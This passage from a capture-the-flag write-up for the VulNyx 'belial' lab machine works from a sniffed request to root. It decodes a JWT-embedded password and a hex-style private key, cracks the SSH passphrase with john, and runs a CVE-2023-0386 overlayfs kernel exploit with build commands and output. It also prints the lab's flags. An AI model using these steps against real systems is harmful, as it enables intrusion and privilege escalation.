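Accept: */*
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2wiOiJzdXBlcmFkbWluIiwibmFtZSI6ImdlbGFsIiwicGFzc3dvcmQiOiJQJHNzdzByZCEzMjEifQ.nujWki5QiuGCqjur_VfBCtvmKk_XGhW7FPrx_dZzOYI
Content-Length: 11044
Content-Type: application/x-www-form-urlencoded

45 45 45 45 45 66 69 71 73 78 32 82 83 65 32 80 82 73 86 65 84 69 32 75 69 89 45 45 45 45 45 10 80 114
"""

def b64url_decode(segment: str) -> bytes:
    """JWT segments drop the '=' padding; restore it before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def jwt_parts(token: str) -> dict:
    """Header and claims of a JWT, read WITHOUT checking the signature.
    The HS256 signature lets the server detect tampering; it does nothing
    for confidentiality, so a password placed in the claims is readable."""
    header_b64, payload_b64, _signature = token.split(".")
    return {"header": json.loads(b64url_decode(header_b64)),
            "claims": json.loads(b64url_decode(payload_b64))}

def parse_captured_request(capture: str) -> tuple:
    """Split a tcpdump -A style HTTP request into (bearer token, body text)."""
    head, _, body = capture.replace("\r\n", "\n").partition("\n\n")
    token = None
    for line in head.splitlines():
        if line.lower().startswith("authorization: bearer "):
            token = line.split(None, 2)[2].strip()
    return token, body

def decode_decimal_ascii(body: str) -> bytes:
    """The -d payload is one decimal byte value per whitespace-separated token."""
    return bytes(int(tok) for tok in body.split())

def recover(capture: str) -> tuple:
    token, body = parse_captured_request(capture)
    return jwt_parts(token)["claims"], decode_decimal_ascii(body)

if __name__ == "__main__":
    claims, key = recover(SAMPLE_CAPTURE)
    print(claims)
    print(key.decode())
```

For the real capture, save it with tcpdump -w instead of reading -A output off the terminal, so that a body spanning several segments is reassembled before decoding.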

Decode the full body.

(screenshot: CyberChef decoding of the decimal body)

It is a private key:

```
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,B0BEEC30B0AC8047
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-----END RSA PRIVATE KEY-----
```

Paste the key into a file and crack it: the passphrase is elizabeth1. This is a legacy PEM key (Proc-Type and DEK-Info headers, DES-EDE3-CBC), and john reports its KDF as MD5/3DES with an iteration count of 2, which is why rockyou goes through it instantly; a modern OpenSSH-format key with the bcrypt KDF would be far slower to attack.

```
❯ vi id_rsa
❯ ssh2john id_rsa >hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
elizabeth1 (id_rsa)
1g 0:00:00:00 DONE (2025-03-06 16:50) 100.0g/s 121600p/s 121600c/s 121600C/s gilbert..buttons
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```

SSH in as gelal with the key: finally the user flag.

The P$ssw0rd!321 found in the JWT is not gelal's account password, so sudo rejects it; the real one must be elsewhere.

.viminfo records vim's editing history.

```
❯ ssh gelal@$ip -i id_rsa
Enter passphrase for key 'id_rsa':
gelal@belial:~$ cat user.txt
VulNyx{3a96ac54dadf2aa5c3ebb59cbb80c191}
gelal@belial:~$ sudo -l
[sudo] password for gelal:
Sorry, try again.
[sudo] password for gelal:
sudo: 1 incorrect password attempt
gelal@belial:~$ cat .viminfo
# This viminfo file was generated by Vim 9.0.
# You may edit it if you're careful!

# Viminfo version
|1,4

# Value of 'encoding' when this file was written
*encoding=utf-8


# hlsearch on (H) or off (h):
~h
# Command Line History (newest to oldest):
:q
|2,0,1689597929,,"q"

# Search String History (newest to oldest):

# Expression History (newest to oldest):

# Input Line History (newest to oldest):

# Debug Line History (newest to oldest):

# Registers:

# File marks:
'0 1 0 ~/.cache/2/0/2/3/_/0/3/8/6/twj.zip
|4,48,1,0,1689597929,"~/.cache/2/0/2/3/_/0/3/8/6/twj.zip"

# Jumplist (newest first):
-' 1 0 ~/.cache/2/0/2/3/_/0/3/8/6/twj.zip
|4,39,1,0,1689597929,"~/.cache/2/0/2/3/_/0/3/8/6/twj.zip"

# History of marks within files (newest to oldest):
```

The most recently opened file is ~/.cache/2/0/2/3/_/0/3/8/6/twj.zip.

Copy it over with scp. The archive is password-protected; the P$ssw0rd!321 from the JWT opens it (x below is a shell extract helper, not a standard command).

```
❯ scp -i vulnyx/id_rsa gelal@$ip:~/.cache/2/0/2/3/_/0/3/8/6/twj.zip vulnyx
Enter passphrase for key 'vulnyx/id_rsa':
twj.zip
❯ x twj.zip
extract: extracting to twj
Archive: /home/Pepster/vulnyx/twj.zip
[/home/Pepster/vulnyx/twj.zip] Urgent.msg password:
inflating: Urgent.msg
```

Kernel privilege escalation

file shows that Urgent.msg is actually a PDF.

```
❯ file Urgent.msg
Urgent.msg: PDF document, version 1.6, 1 page(s)
mv Urgent.msg Urgent.pdf
```

Open it in a browser.

It hints at a kernel vulnerability and names some development packages (libfuse-dev, libcap-dev), which are indeed installed on the box:

(screenshot: Urgent.pdf)

```
gelal@belial:~$ find / -name libfuse-dev 2>/dev/null
/usr/share/doc/libfuse-dev
gelal@belial:~$ find / -name libcap-dev 2>/dev/null
/usr/share/doc/libcap-dev
```

Searching on those keywords leads to CVE-2023-0386:

(screenshot: search results)

CVE-2023-0386 Linux kernel vulnerability in overlayfs - vsociety

xkaneiki/CVE-2023-0386: privilege escalation with CVE-2023-0386 on Ubuntu 22.04

sxlmnwb/CVE-2023-0386: Vulnerabilities Exploitation On Ubuntu 22.04

security-labs-pocs/proof-of-concept-exploits/overlayfs-cve-2023-0386 at main · DataDog/security-labs-pocs

In short: when overlayfs copies a file up from the lower layer it keeps the file's owner and setuid bit without checking that the user who mounted the overlay may create files with those ids, so a setuid file that a FUSE filesystem (hence the libfuse hint) reports as owned by uid 0 ends up on the upper layer as a genuine setuid-root binary. That is why the exploit needs a FUSE daemon running in one terminal and the overlay mount in another.

Compilation failed; fuse.c needs a few edits, most likely because the gcc on the box treats the implicit function declarations and the mismatched printf formats in the original source as errors.

After #include <errno.h> add:

```c
#include <unistd.h>   // read(), close(), rmdir()
#include <fcntl.h>    // open()
#include <sys/stat.h> // mkdir()
```

Fix the printf format types:

```c
printf("offset %ld\n", (long)off);
printf("size %zu\n", size);
```

Instead of make all, compile fuse.c by hand, dynamically linked against the system libfuse.

Build it again and start the FUSE daemon:

```
gelal@belial:/tmp/CVE-2023-0386$ vi fuse.c
gelal@belial:/tmp/CVE-2023-0386$ gcc fuse.c -o fuse -D_FILE_OFFSET_BITS=64 -pthread -lfuse -ldl
gelal@belial:/tmp/CVE-2023-0386$ ./fuse ./ovlcap/lower ./gc
[+] len of gc: 0x3ed8
[+] readdir
[+] getattr_callback
/file
[+] open_callback
/file
[+] read buf callback
offset 0
size 16384
path /file
[+] open_callback
/file
[+] open_callback
/file
[+] ioctl callback
path /file
cmd 0x80086601
```

Open a second terminal and run the exp binary:

```
gelal@belial:/tmp/CVE-2023-0386$ ./exp
uid:1002 gid:1002
[+] mount success
total 8
drwxrwxr-x 1 root root 4096 Mar 6 09:38 .
drwxrwxr-x 6 root root 4096 Mar 6 09:38 ..
-rwsrwxrwx 1 nobody nogroup 16088 Jan 1 1970 file
[+] exploit success!
root@belial:/tmp/CVE-2023-0386# id
uid=0(root) gid=0(root) groups=0(root),1002(gelal)
root@belial:/tmp/CVE-2023-0386# cat /root/root.txt
VulNyx{7f2d71a3a6c9e3e42aa2443c1026dd9c}
```